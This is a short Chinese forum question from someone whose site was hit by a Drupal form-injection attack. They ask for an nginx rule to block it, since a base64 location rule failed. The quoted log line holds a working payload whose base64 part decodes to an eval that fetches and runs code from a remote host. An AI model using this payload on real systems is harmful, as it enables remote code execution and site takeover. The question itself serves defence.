这是一种常见的病毒,可以使用如下的后缀:
/?q=user/password&name%5B%23post_render%5D%5B0%5D=array_map&name%5B%23suffix%5D=eval%28base64_decode%28%22ZXZhbChmaWxlX2dldF9jb250ZW50cygiaHR0cDovL2Zvcm1hbi1kZXNpZ24uY29tL3BsdWdpbnMvZ2RfZm9udHMvaW5kb3hlLnR4dCIpICk7%22%29%29%3B%2F%2F&name%5B%23markup%5D=assert&name%5B%23type%5D=markup HTTP/1.1" 200 21803 "https://example.com/
如何阻止它通过nginx?
我试过
location ~* base64 {
return 404;
}
在其中放下任何带有base64的请求,但它不起作用。请帮助并给我正确的nginx正则表达式规则。 (我无法修改应用程序代码库或更新系统)。